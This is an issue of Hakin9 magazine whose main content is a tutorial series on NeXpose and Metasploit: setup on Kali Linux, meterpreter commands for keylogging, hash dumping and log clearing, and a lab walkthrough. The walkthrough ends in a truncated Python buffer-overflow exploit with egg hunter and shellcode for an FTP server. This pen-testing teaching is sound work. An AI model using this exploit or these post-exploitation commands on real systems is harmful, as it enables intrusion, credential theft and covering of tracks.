Hakin9 - ISO Interactive
Transcription
Hakin9 - ISO Interactive
Cyber Security Auditing Software Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand. he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com NeXpose and Metasploit Pro Hacking Copyright © 2015 Hakin9 Media Sp. z o.o. SK Table of Contents 07 11 21 31 49 74 80 NeXpose and Metasploit Pro Hacking by Raheel Ahmad Metasploit Pro Professional Use by Raheel Ahmad NeXpose and Metasploit Lab by Raheel Ahmad Hacking with NeXpose and Metasploit by Raheel Ahmad Basecamp – Project Management for the Sane by Troy Hipolito Tackling SYN Flood attacks by Ratan Jyoti Implementation Of Transparent Data Encryption (Tde) And Additional Compensational Controls As Alternative Method Regarding Encryption Of Pan Numbers In Microsoft Sql Database (Pci Dss V3.0, Section 3.4) by Darko Mihajlovski, Kiril Buhov, Jani Nikolov 86 88 90 92 94 Hacking Journalists by Bob Monroe Offended by Offensive Security by Bob Monroe Shouting at the Security Waves by Bob Monroe RGB LED Lighting Shield with XMC1202 for Arduino by Bob Monroe Security in Computing by Charles P. Pfleeger, Shari Lawrence Pfleeger ad Jonathan Mrgulies by Bob Monroe 4 NeXpose and Metasploit Pro Hacking Dear Readers, T his new issue of Hakin9 Magazine is coming out today. I hope that my words find you well and in a happy mood. I hope that you will find many interesting articles inside the magazine and that you will have time to read all of them. All comments are welcome. We collected the articles written by experts in their field to provide you with highest-quality knowledge. Enjoy your reading and develop your new skills with our magazine! Inside this Hakin9 issue, we publish articles that will present security knowledge. If you want to find out more about penetration testing, you should read them all. We would like to highlight the articles on Nexpose and Metasploit. Also, we recommend that you read Darko Mihajlovski’s article. “Proper” TDE implementation should cover the 3.4 requirement from PCIDSS v3, where it demands the following: Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches: • One-way hashes based on strong cryptography (hash must be of the entire PAN) • Truncation (hashing cannot be used to replace the truncated segment of PAN) • Index tokens and pads (pads must be securely stored) • Strong cryptography with associated key-management processes and procedures. Of course, please do not forget to read the other articles. I would like to mention that as long as we have our precious readers, we have a purpose. We owe you a huge THANK YOU. We are grateful for every comment and opinion, either positive or negative. Every word from you lets us improve Hakin9 magazine and brings us closer to the ideal shape of our publication. Thank you. Ewa & Hakin9 team 5 Editor in Chief: Ewa Dudzic [email protected] Editorial Advisory Board: David Kosorok, Matias N. Sliafertas, Gyndine, Gilles Lami, Amit Chugh, Sandesh Kumar, Trish Hullings Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise. Publisher: Paweł Marciniak CEO: Ewa Dudzic [email protected] Art. Director: Ireneusz Pogroszewski [email protected] DTP: Ireneusz Pogroszewski Publisher: Hakin9 Media sp. z o.o. SK 02-676 Warszawa, ul. Postępu 17D NIP 95123253396 www.hakin9.org/en [ GEEKED AT BIRTH ] Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only. All rights to trademarks presented in the magazine are reserved by the companies which own them. DISCLAIMER! The techniques described in our magazine may be used in private, local networks only. The editors hold no responsibility for the misuse of the techniques presented or any data loss. You can talk the talk. Can you walk the walk? [ IT’S IN YOUR DNA ] LEARN: Advancing Computer Science Artificial Life Programming Digital Media Digital Video Enterprise Software Development Game Art and Animation Game Design Game Programming Human-Computer Interaction Network Engineering Network Security Open Source Technologies Robotics and Embedded Systems Serious Game and Simulation Strategic Technology Development Technology Forensics Technology Product Design Technology Studies Virtual Modeling and Design Web and Social Media Technologies www.uat.edu > 877.UAT.GEEK Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs. NeXpose and Metasploit Pro Hacking NeXpose and Metasploit Pro Hacking by Raheel Ahmad Welcome to the “NeXpose and Metasploit Pro Hacking” Workshop. In this workshop, you will learn more about NeXpose and Metasploit features, their usage and how you can best utilize these tools in order to perform penetration testing or security assessment of your organization. You will be able to learn more about NeXpose, the great vulnerability assessment and management software available in the market. In the field of security testing or penetration testing, vulnerability assessment plays an important role in order to successfully penetrate into any network or system. To achieve this goal or perform the tasks, you need a cutting edge vulnerability assessment tool in order to assess the security of the target network or in other words perform vulnerability assessment. NeXpose isn’t the only tool available in the market to perform vulnerability assessment, however, it is one of the best among the industry leading tools in vulnerability assessment. Basically, the vulnerability assessment leads to the exploitation phase in the ethical hacking or penetration testing lifecycle and NeXpose gives you an edge and represents how you can exploit the discovered vulnerability. Industry Comments: http://www.scmagazine.com/rapid7-nexpose-v55/review/3796/. Like any other security product, NeXpose has certain requirements for its installation. You should know in detail how you can get most out of this tool. NeXpose Installation Requirements Minimum Hardware • 2 GHz+ processor • 8 GB RAM (64 bit) • 80 GB+ available disk space (10 GB for Community Edition) • 10 GB+ available disk space for Scan engines • English operating system with English/United States regional settings • 100 Mbps network interface card Operating Systems 64-bit versions of the following platforms are supported. • Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2) • Red Hat Enterprise Linux 5.x, 6.x • Ubuntu Linux 10.04 LTS, 12.04 LTS • Kali Linux 1.0.x • Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5. 7 NeXpose and Metasploit Pro Hacking NeXpose Editions NeXpose comes in a couple of different editions with the flexibility and capabilities ranging from individual user to the ultimate level as shown in the below figure. Details on all of these editions are available on the rapid7 official page on this link. http://www.rapid7.com/ products/nexpose/editions.jsp. Our workshops will use the consultant edition in our lab. Why Using NeXpose? In the overall penetration testing or ethical hacking lifecycle, “Vulnerability Assessment & Management” is the actual phase where you discover potential vulnerabilities in the targeted network or system. There are many tools available in order to automate this process that enable security professionals or administrators to effectively determine the security posture of their network. NeXpose helps in different ways to achieve this goal and provides support for performing an in-depth vulnerability assessment. This tool is better than the other vulnerability assessment tools available in the market. The best part is that it provides details on available exploits on exploit-db and Metasploit Framework for the discovered vulnerabilities and creates files in the same configuration as the Metasploit Modules, which you can use to configure Metasploit for exploitation. NeXpose has great compatibility with the Metasploit Framework, which gives it another edge in the industry and an advantage for security testers. NeXpose also comes in a standalone virtual box that you can integrate into your virtual servers as a separate deployment. NeXpose scan engine and its security console gives another edge for its performance and better reliability. You will further explore this tool’s features in the workshop and a complete walkthrough of its usage. NeXpose Components NeXpose architecture is distributed into two main components; this includes a central server, and one or more scanning engines. The central server is called the NSC (NeXpose Security Console) and the scan engine is called NSE (NeXpose Scan Engine). The main purpose of a central server is to run a Web server process in order to provide access to its users and connect with a backend database for information storage and a scan engine to scan assets. Additional scan engines can be placed similarly within the network to originate scanning under the control of the NSC. This is a distributed architecture with scan engines and servers communicating over a secure connection. If you have a NeXpose Security Console (NSC), it will perform the following operations: • It communicates with Scan Engines to start scans, retrieve scan information, and store scan data. • It provides a Web interface for managing all NeXpose operations. 8 NeXpose and Metasploit Pro Hacking • It downloads product and content updates from the Rapid7 update server. • The Security Console Appliance also includes a local Scan Engine. • If you have a NeXpose Scan Engine (NSE), your Appliance performs asset discovery, vulnerability detection, and policy compliance testing. A Security Console controls it. Vulnerability Assessment & NeXpose In today’s war of performing vulnerability assessments with the available tools in the industry, one of the biggest challenges for any vulnerability management program is the analysis of scan results. If you want good verifiable and actionable results, in order to effectively remediate them, you need some solutions for the discovered vulnerabilities, or else you can be overwhelmed with false positives which can affect the overall vulnerability assessment process or the program. The above NeXpose architectural model provides a design to solve this problem and have flexibility for building a simpler vulnerability check model with a higher degree of accuracy. Vulnerability scans with NeXpose generate real risk analysis, credible remediation plans and easy to use data management functions. This is achieved by an extensive Vulnerability Detection which is based on proactive scanning of systems and services; it also covers web and databases. To provide more focused and dedicated scans, NeXpose has templates to be used for different multiple predefined scan types and you will get the flexibility to create your own. However, the existing templates cover a wide range of scenarios and include full/normal audit, denial-of-service, penetration testing and database testing. Moreover, NeXpose can also help you to identify known vulnerabilities along with the configuration compliance issues for: • Web sites/services • Databases • Network equipment • Operating systems • Applications All this detection happens during the same scan and from the same scan engine, hence it makes simpler for you to configure and to get all the information you need at one time for any usage. Vulnerability Reporting and NeXpose For an ethical hacker, or a professional penetration tester, the main challenge is to report what he or she has been doing in the overall vulnerability assessment or exploitation phases or the complete ethical hacking lifecycle execution. This requires some good presentations along with the technical details, as well as a business related management summary so that an ethical hacker can explain what he or she has been performing while trying to ethically hack the targeted network. To achieve these tasks when you are finished with vulnerability scans or compliance scans, you can now assess the risk and determine what is most important for the targeted network environment. NeXpose includes several reports which help with this including: • Prioritized Remediation Report • Top 10 Vulnerability Report • Audit Report 9 NeXpose and Metasploit Pro Hacking These reports conclusively cover all available patches and all known vulnerabilities in the targeted network environment and provide a prioritized list of which remediations will have the most impact on risk in the environment. NeXpose also offers the flexibility to report on the assets and vulnerabilities which are important in the targeted network environment by means of rich asset and vulnerability filtering. Such reports can be automated from the UI or API so that as soon as a scan completes, remediation owners get the accurate and detailed information they need to do their jobs and stakeholders can get accurate information on how risk is changing over time. Report generation is another major factor to make this tool the best among the best because it will not disappoint you if accuracy in report generation is of more importance than simply dumping the report content. In summary, NeXpose provides a detailed and in-depth vulnerability assessment and management along with a step ahead assistance in the exploitation phase of penetration testing or ethical hacking. It is recommended to have detailed hands-on skills if you want to stand out from others in the penetration testing field. We hope it’s been informative for you and thank you for completing the article. In the next article, a Metasploit in depth study will be covered and later we will explore how to work with NeXpose and Metasploit together to perform an extensive security assessment. About the Author Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT Founder of 26Securelabs an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec. 10 NeXpose and Metasploit Pro Hacking Metasploit Pro Professional Use by Raheel Ahmad You will be studying in depth about the Metasploit Framework. This will also help you study the extraordinary benefits of this security tool, which also plays a key role in the exploit development lifecycle. Metasploit is the bread and butter for many information security professionals or pen testers. Metasploit Framework – The Hacker’s Bread There are a couple of good exploitation tools available in the market that are used by security professionals, however, Metasploit leads the industry due to a couple of reasons. There are other tools available, like Core Impact and Immunity Canvas, which lead the market along with Metasploit. The problem is that these tools are closed source and you would not be able to find even their crack or open version from any authentic source. Metasploit comes in a community edition, which doesn’t have any major differences in features in comparison to the pro version of Metasploit. Many freelancers and small companies in security consulting use this community edition of Metasploit and the community edition is also used by many professionals who practice hacking in order to advance their hacking skills and exploitation techniques. I personally used Metasploit from its early days and still make a good use of this framework when I need to perform exploit research and testing in my lab. Metasploit Architecture’s Basics 11 NeXpose and Metasploit Pro Hacking Metasploit framework is a modular framework; the most fundamental piece of the architecture is the Rex library, which is short for Ruby Extension Library.The lowest level is core library and this is followed by base. Finally, base library is extended by framework UI which implements support for the different types of user interfaces to the framework itself, such as command line and web interface. Separate from the framework itself are the articles and plugins that it’s designed to support. Metasploit Framework fundamentals include the [msfcli], [msfconsole], [exploits], [payloads], [database] and the famous [meterpreter]. Metasploit is not just the exploitation tools; it has many features that will help you in exploits research and development. Plus, you can develop your own Metasploit Modules and add the flexibility as per your need or requirements for the dedicated pen testing projects. Fundamentals are just the tools you can use or someone who just uses Metasploit as a click and go tool for performing pen testing or ethical hacking. This tool is awesomely developed and helps in many different ways and is widely used by information security professionals. This article will highlight as much as possible as this tool requires a complete workshop on it, if you want to understand and want to become master of it. However, you will be able to learn the maximum professional usage of this great tool in pen testing. Metasploit Commands to Memorize If you want to learn Metasploit and use it in your pen testing projects or for any security research and exploit development, then there are some core commands you should understand and have hands-on experience with. 12 NeXpose and Metasploit Pro Hacking General Commands ? – help menu background – moves the current session to the background bgkill – kills a background meterpreter script bglist – provides a list of all running background scripts bgrun – runs a script as a background thread channel – displays active channels close – closes a channel exit – terminates a meterpreter session help – help menu interact – interacts with a channel irb – go into Ruby scripting mode migrate – moves the active process to a designated PID quit – terminates the meterpreter session read – reads the data from a channel run – executes the meterpreter script designated after it use – loads a meterpreter extension write – writes data to a channel File System Commands cat – read and output to stdout the contents of a file cd – change directory on the victim del – delete a file on the victim download – download a file from the victim system to the attacker system edit – edit a file with vim getlwd – print the local directory getwd – print working directory lcd – change local directory lpwd – print local directory ls – list files in current directory mkdir – make a directory on the victim system pwd – print working directory rm – delete a file rmdir – remove directory on the victim system upload – upload a file from the attacker system to the victim Networking Commands ipconfig – displays network interfaces with key information including IP address, etc. portfwd – forwards a port on the victim system to a remote service route – view or modify the victim routing table System Commands clearav – clears the event logs on the victim’s computer drop_token – drops a stolen token execute – executes a command getpid – gets the current process ID (PID) getprivs – gets as many privileges as possible getuid – get the user that the server is running as kill – terminate the process designated by the PID ps – list running processes reboot – reboots the victim computer reg – interact with the victim’s registry rev2self – calls RevertToSelf() on the victim machine shell – opens a command shell on the victim machine shutdown – shuts down the victim’s computer steal_token – attempts to steal the token of a specified (PID) process sysinfo – gets the details about the victim computer such as OS and name 13 NeXpose and Metasploit Pro Hacking User Interface Commands enumdesktops – lists all accessible desktops getdesktop – get the current meterpreter desktop idletime – checks to see how long since the victim system has been idle keyscan_dump – dumps the contents of the software keylogger keyscan_start – starts the software keylogger when associated with a process such as Word or browser keyscan_stop – stops the software keylogger screenshot – grabs a screenshot of the meterpreter desktop set_desktop – changes the meterpreter desktop uictl – enables control of some of the user interface components Privilege Escalation & Password Dump & Timestomp Commands getsystem – uses 15 built-in methods to gain sysadmin privileges hashdump – grabs the hashes in the password (SAM) file timestomp – manipulates the modify, access, and create attributes of a file Metasploit Professional Use Metasploit Framework has been in the industry for a while now and it’s a first choice of security professionals when you talk about pen testing, however, not all security professionals have hands-on experience with Metasploit, they just use it as a tool that has the bulk of exploits available that can be launched by anyone. This is not the professional usage of Metasploit. If you, as a security professional, want to stand out from such professionals, then be an expert in using this great tool. In order to have an expert level experience with Metasploit, you should have following skills developed by using this wonderful tool: • At first you should understand how this tool works • Modules Information • Exploiting and Pivoting • Customization of Modules • Developing a Metasploit Module • Exploit Development with Metasploit A couple of these skills will be covered in this module and the remaining will be explored in the last module with hands-on testing in the workshop. Keep learning with hakin9! Metasploit Usage The commands presented above only cover some basics of the command line usage of this tool. You will be able to explore more on the pro version of Metasploit. However, let’s quickly review what else you can do from the command line. Functionality available from the command line is given below with the usage details. 14 NeXpose and Metasploit Pro Hacking Command Line Access Type help and you will see core commands, some of them are shown below: 15 NeXpose and Metasploit Pro Hacking Other commands you can see are related to database functionality as shown below in the snapshot. Now, you can also load different modules available in the Metasploit Framework, which works in integration with other security tools for advanced usage and basically professionally performing pen testing via a single command line platform of the Metasploit Framework. All the modules available by default when Metasploit Framework runs can be found in the module directory of the Metasploit Framework. This can be different and depends on the installation directory as well as the operating system on which you have installed the Metasploit Framework. On Kali Linux, you can found these modules located on the following path as shown below in the snapshot. However, there are some more modules that you can add at run time. These modules are shown below; each of these modules would be loaded into the run time environment by using the “load” command. You should practice loading these modules and use them one by one. Usage details are also available from the command and will be presented shortly here. 16 NeXpose and Metasploit Pro Hacking Loading Nessus Modules on Run Time Loading NeXpose Module on Run Time 17 NeXpose and Metasploit Pro Hacking Loading other Modules on Run Time Loading Famous “wmap” & “sqlmap” Modules on Run Time Once all of these modules are loaded, you will be able to see commands, or let’s say functionality, you can perform with these modules, like directly performing vulnerability scans from Metasploit Framework by use of Nessus and NeXpose modules just loaded or run Web Application assessments with the help of “SQLMAP and WMAP” modules loaded and similarly for the other modules we have just loaded. The following snapshots show the available functionality after loading these modules. 18 NeXpose and Metasploit Pro Hacking Nessus features available after loading its module: Similarly, NeXpose features are also available after its module is loaded. After loading all of these modules, let’s look at what you will be able to perform from Metasploit Command Line Interface: • Nessus Vulnerability Scans • NeXpose Vulnerability Scans 19 NeXpose and Metasploit Pro Hacking • Web Scans with “wmap” • Database testing with “sqlmap” • Exploitation This is called a full flashed pen testing platform that gives you flexibility to run multiple tasks from a single platform. This is the power of Metasploit and you can also develop your own module and import it into Metasploit Framework. You will be able to explore all of these features in the upcoming modules where you will be performing hands-on testing with these modules and developing your skills with Metasploit Framework. But it’s not enough at this stage, you still need to explore exploit development features available in Metasploit which were stated earlier in the module. Exploit development features of Metasploit will be covered in last module.In our opinion, Metasploit provides efficient use from the command line and, as a security professional, you should be an expert with the command line and that’s what the industry considered however it is not the rule! Hackers like “shell”. Keep learning with hakin9! We have more for you to learn and hack! About the Author Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT Founder of 26Securelabs an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec. 20 NeXpose and Metasploit Pro Hacking NeXpose and Metasploit Lab by Raheel Ahmad You will be learning “how to setup” one box with multiple core hacking tools which can help you perform ethical hacking or pen testing. You can perform customization on these tools and get them ready for your quick usage. However, it will require a suitable hardware requirement so that you can run these tools together. You should be able to download and get the keys for other than the community editions of NeXpose and Metasploit Framework, however, if you only have community versions then it doesn’t make much of a difference in learning but it’s better to use professional versions, if possible. Hardware Requirements NeXpose hardware requirements have already been presented in the previous article and Metasploit doesn’t require more than what NeXpose needs to run on a standalone machine. However, do ensure that you meet the recommended requirements if you don’t want hiccups at the time of performing vulnerability scans on a large pool of addresses or exploitation analysis on different bugs. The faster your machine is, the better your performance, and better output. Choosing Operating System Platform NeXpose and Metasploit framework now support multiple operating system platforms on which you can install these tools, however, security professionals’ preferences and the performance capabilities varies from OS to OS. Operating Systems Supported by NeXpose 64-bit versions of the following platforms are supported. • Microsoft Windows 7, Windows 8, Server 2008 (R2), Server 2012, Server 2012 (R2) • Red Hat Enterprise Linux 5.x, 6.x • Ubuntu Linux 10.04 LTS, 12.04 LTS • Kali Linux 1.0.x • Virtualized Machines on VMware ESXi 5.x, VMware vCenter Server 4.x, VMware vCenter Server 5.x Operating Systems Supported by Metasploit • Windows Vista, Windows 7, Windows 8.x, Server 2003, Server 2008 and Server 2012 (64 bit recommended) • Red Hat Enterprise Linux 5.x, 6.x (x86 and x86_64) • Ubuntu Linux 10.04, 12.04, 14.04 (x86 and x86_64) • Kali Linux 1.0 (Metasploit pre-installed; supported on i386 and AMD64 only) 21 NeXpose and Metasploit Pro Hacking For this workshop, we initially thought to use Ubuntu Platform for running these tools on a single operating system but then later shifted to Kali Linux as it comes with a preinstalled version of Metasploit that you just need to update and we will only be installing NeXpose as a standalone installation to complete our lab for this workshop. Moreover, we will be able to quickly add different modules to Metasploit that we studied in the previous module. So for a couple of these reasons, our preference went towards Kali Linux and no doubt that Kali will give support in the overall ethical hacking cycle which other operating systems would lack. Kali Linux You need to be good in Kali Linux if you want to become good in hacking, as Kali Linux now has become de-facto standard in ethical hacking and pen testing. You can easily download this OS from kali.org website and you can find out how to setup a virtual machine for Kali Linux on different hakin9 workshops too, so we will not be covering it here. However, this module will cover customization of Kali Linux before you move on to setting up this lab. If you are a student or a freelancer, then a virtual environment is the best fit for you, however, performance is much better if dedicated hardware is used for this purpose. Setup Your NeXpose and Metasploit Box Login to the Kali Linux console and download NeXpose into Kali Linux. Once NeXpose is available for installation, continue to the first setup requirements for Metasploit to run smoothly, as you have just freshly installed the Kali Linux. Follow the guidelines below as shown in snapshots and command line. Login to the Kali Console and run the following commands as shown in the below snapshots in order to setup Metasploit smoothly. Configuring “postgresql” and “Metasploit” to run as a service on boot time as shown below: 22 NeXpose and Metasploit Pro Hacking Starting database and Metasploit service to configure the first time configuration as shown below: Type commands to run Metasploit from command line as shown below. It will take some time to configure the required database and configurations as shown in the snapshot. Once configuration is complete, you will be able to see the console as shown below: 23 NeXpose and Metasploit Pro Hacking Since it is a fresh installation, it is nice to update your Metasploit Framework, as shown below, by simply typing “msfupdate” command. Good, you can see that our fresh installation of Kali Linux is now getting Metasploit updates. After updating the Metasploit Framework, you need to verify how many exploits and payloads or auxiliary modules it has downloaded. After finishing the download and upgrade process, you will notice a change in numbers for exploits, payloads, etc. 24 NeXpose and Metasploit Pro Hacking Cool, now you can upgrade to the professional version of Metasploit by launching the “go pro” command from its console. However, it would require you to have the same licensing requirements. You can complete the workshop with community version of Metasploit and NeXpose without hiccups. Setting up Metasploit Console for other functionalities Now it’s time to slightly twist your Metasploit copy by enabling plugins; this is simply loading the modules available in the Metasploit Framework as explained in the previous module. You should be able to load modules including all those modules explained. You should practice these modules, especially “Nessus”, “NeXpose”, “wmap”, “sqlmap” and “openvas” modules so that you cover all security tools integration available in Metasploit Framework. Now, your Metasploit is ready and running with integration of these security tools and you can run scans by using all those tools and use their scan results to perform exploitation analysis. 25 NeXpose and Metasploit Pro Hacking Now, you should move to the NeXpose Installation, download it from the rapid7 website from Kali Linux as shown in below snapshots sequentially. Now run a command line shell and make it an executable file as shown below in the snapshot by using the same commands. We have taken the snapshot while installing it on Kali Linux as shown below in the snapshots sequentially. 26 NeXpose and Metasploit Pro Hacking 27 NeXpose and Metasploit Pro Hacking If everything goes fine in your installation, you should be able to successfully install NeXpose on Kali Linux as shown below in the snapshot. 28 NeXpose and Metasploit Pro Hacking After finishing the installation, browse the link shown in the above windows and enter your product license key for registering this fresh copy of your NeXpose installation. Activate NeXpose 29 NeXpose and Metasploit Pro Hacking This will take a bit of time and then NeXpose will initialize. This completes your lab setup for setting up Metasploit and NeXpose both in one box on Kali Linux Platform. We hope this has been informative for you and thank you for completing the module. In the next module, you will be able to conduct scans and exploitation to perform hacking with Metasploit and NeXpose. About the Author Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT Founder of 26Securelabs an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec. 30 NeXpose and Metasploit Pro Hacking Hacking with NeXpose and Metasploit by Raheel Ahmad So, now you will learn about how to utilize these tools for hacking purposes. Quick Facts on Hacking Methodology Hacking methodology basically needs a detailed explanation and for this you need a separate workshop to put light on this detailed and very technical topic. However, for your better understanding, this article will cover the core of the hacking methodology used by hackers mostly in ethical hacking and/or penetration testing projects. Hacking Methodology The key steps in the hacking methodology are outlined below in sequential order and forms the base for the core hacking attempts. Live System Scans This is basically the information gathering phase in which you will be identifying the live hosts in the targeted network of the organization. How would this be achieved? Answer: This is achieved by means of using scanning tools as an active information gathering technique. You will be using Metasploit Framework only to complete this phase as we have all sets of the required modules of Metasploit framework to run from console only. Ports and Services Scanning The second step is identifying the operating system of the hosts, which were discovered during the previous step. This is necessary to know more about the hosted machine. This could be a network device or a database server or it could be a Windows or Linux machine. Once you have the operating system type discovered, the next step is to find the open ports and the services hosted by these host machines. However, the above two key steps can be performed in parallel by use of scanning tools. How would this be achieved? Answer: This will be achieved by means of scanning tools that are available in Metasploit Framework and a module or by using scanning tools for which you have added modules on run time which we have discussed in detail in previous modules. Vulnerability Scanning Vulnerability assessment is the actual phase where you will be discovering potential vulnerabilities in the network.There are many tools available to automate this process.But, ideally, you cannot directly jump to discover vulnerabilities. 31 NeXpose and Metasploit Pro Hacking How would this be achieved? Answer: This will be achieved by use of tools like NeXpose, Nessus and many more available in the market. Metasploit plays a key role here, as well, where you have enabled Metasploit Framework to use NeXpose and Nessus as vulnerability scanners after enabling integration of these scanners with Metasploit Framework. Exploitation Once you have performed all of these tasks then the actual time for hacking into any network or systems comes into play where you will exploit the vulnerability and then gain access to the victim or exploited machine. This is called exploitation of vulnerabilities. How would this be achieved? Answer: This will be achieved by use of Metasploit Framework, if the exploit for this vulnerability is available in the Metasploit. What if the exploit is not available in Metasploit Framework? Answer: Then if you are a security professional and know how to use Metasploit for performing exploit development, you should develop the exploit by using Metasploit or other tools and then develop the Metasploit Module for your discovered vulnerability. Once you have this, add this newly developed module into Metasploit Framework Real Time Hacking Now you should have the virtual lab ready at this stage to perform the hacking attempts and the module development for Metasploit Framework for your own discovered vulnerability. Lab Design You should have a couple of Virtual Machines running in your virtual lab and we recommend that you setup a vulnerable machine created by rapid7; it is called Metasploitable and available for free on their website. For this module, we will be using victim machines running the following operating systems: • Metasploitable Linux • Ubuntu OS • Windows XP • Windows 2008 Kali Linux will be our hacking platform as we have configured in the previous module with NeXpose and Metasploit. We will perform hacking with the tools mentioned in this workshop and would like to cover as much as possible, virtually. 32 NeXpose and Metasploit Pro Hacking Information Gathering Metasploit Console Running information gathering via Metasploit Framework by performing port scanning by using “nmap”. To perform this scan, first check database connectivity as shown below: 33 NeXpose and Metasploit Pro Hacking Now run the “nmap” scan by using the command “db_nmap” so that the scan results are saved in Metasploit Database. As we have launched the full scan so that we can discover all the required information including ports, service and operating systems running, it will take a bit of time. You can see the snapshot below where “nmap” is busy performing vulnerability scans by using scripting engine. 34 NeXpose and Metasploit Pro Hacking Once “nmap” finishes the scan, you should be able to see the results in the database by using commands as shown in the below snapshot. You should be able to discover all the hosts in the network range provided for the scan and detecting operating systems. In order to see the ports and services running on these hosts, you should run the “services” command to see such details as shown below in the snapshot. At this stage of our hacking attempt we have all the information including: • Live Systems • Operating System Information • Open Ports • Services Running • Service Versions What you need now is vulnerability discovery. For this you should use NeXpose as a vulnerability scanner to perform this activity. You can run NeXpose scan by simply running the scan from the command line of Metasploit, as well as by using the web portal of NeXpose. This module will cover both methods. 35 NeXpose and Metasploit Pro Hacking NeXpose Scan from Metasploit Console Load NeXpose module and then see the available commands as shown below NeXpose Connection First you should establish connectivity with NeXpose scanner by using “nexpose_connect” command. Once connected, you can also check details of the system running NeXpose as shown below. This is useful when you have multiple scanners. 36 NeXpose and Metasploit Pro Hacking You can now execute a scan against the hosts discovered by the “nmap” scan you performed. NeXpose will run the vulnerability scan against those hosts by using the commands as shown below. You can use the options as shown in the above snapshot. In the lab for this module, the scan was launched with the following options; you can also see the output of the scan in the below snapshot: NeXpose is busy running the scan, now let’s login via web portal and see it there also. Login with the credentials you used during the NeXpose installation as covered in previous modules. The scan launched via Metasploit Console is now seen in the above snapshot as logged via web access. Further information of the scan is also shown below. 37 NeXpose and Metasploit Pro Hacking Once the scan is finished, you should be able to see the results in the vulnerability section as shown below. You can see the same results via the command line of Metasploit but results would be in raw format as shown in the below snapshot by using “vulns” command. 38 NeXpose and Metasploit Pro Hacking We used the search switch to look for all “mysql” vulnerabilities which were discovered in this scan. So far in this module, you have practiced the “Ethical Hacking” methodology that you studied earlier, now it’s time to complete the hacking attempts by exploiting the vulnerabilities. This workshop will exploit selected vulnerabilities; you should review the report and discovered vulnerabilities in detail to gain more knowledge and understanding of the ethical hacking lifecycle. Exploiting Vulnerabilities Among the discovered vulnerabilities for this exercise, the selected vulnerabilities are as follows. 1. Ability FTP Server on Windows 2. Apache on Linux As shown in the above snapshot, a NeXpose scan was launched again separately for Windows Machine and scan results are shown below. Among the discovered vulnerabilities, the Golden FTP bug was selected to demonstrate the exploitation in order to hack into the Windows machine. Hacking into Windows Machine We exploited the Ability FTP Server with our own written exploit by using Python scripting, and if you want to learn more on this, please complete the workshop “Advanced Exploitation Techniques”. Below is the exploit code we have written. Shortly you will learn how you can develop your own module of this exploit for Metasploit Framework. 39 NeXpose and Metasploit Pro Hacking import socket import struct # junk data equal in size as of offset detected at 968 bytes after which EIP is overwritten junk = „\x41” * 1000 # we subtracted 32 bytes from original offset as we will be adding up our egg_hunter code which is 32 bytes junk1 = ‚\x41’ * 936 #nops to clean up any garbage values in stack -- this is called padding and it’s very effective nops = „\x90” * 26 # egg hunter created with mona.py with tag w00t egg_hunter = „\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74” egg_hunter += „\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7” #stack address to jump retaddress = „\x99\xC0\x96\x7C” #Stage 2 shellcode which is actually larger shellcode to be executed by our egg hunter code buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf buf = += += += += += += += += += += += += += += += += += += += += += += += += += += += += += „” „\xdb\xdc\xd9\x74\x24\xf4\xba\xda\x88\x04\xa1\x5e\x2b” „\xc9\xb1\x56\x31\x56\x18\x03\x56\x18\x83\xc6\xde\x6a” „\xf1\x5d\x36\xe3\xfa\x9d\xc6\x94\x73\x78\xf7\x86\xe0” „\x08\xa5\x16\x62\x5c\x45\xdc\x26\x75\xde\x90\xee\x7a” „\x57\x1e\xc9\xb5\x68\xae\xd5\x1a\xaa\xb0\xa9\x60\xfe” „\x12\x93\xaa\xf3\x53\xd4\xd7\xfb\x06\x8d\x9c\xa9\xb6” „\xba\xe1\x71\xb6\x6c\x6e\xc9\xc0\x09\xb1\xbd\x7a\x13” „\xe2\x6d\xf0\x5b\x1a\x06\x5e\x7c\x1b\xcb\xbc\x40\x52” „\x60\x76\x32\x65\xa0\x46\xbb\x57\x8c\x05\x82\x57\x01” „\x57\xc2\x50\xf9\x22\x38\xa3\x84\x34\xfb\xd9\x52\xb0” „\x1e\x79\x11\x62\xfb\x7b\xf6\xf5\x88\x70\xb3\x72\xd6” „\x94\x42\x56\x6c\xa0\xcf\x59\xa3\x20\x8b\x7d\x67\x68” „\x48\x1f\x3e\xd4\x3f\x20\x20\xb0\xe0\x84\x2a\x53\xf5” „\xbf\x70\x3c\x3a\xf2\x8a\xbc\x54\x85\xf9\x8e\xfb\x3d” 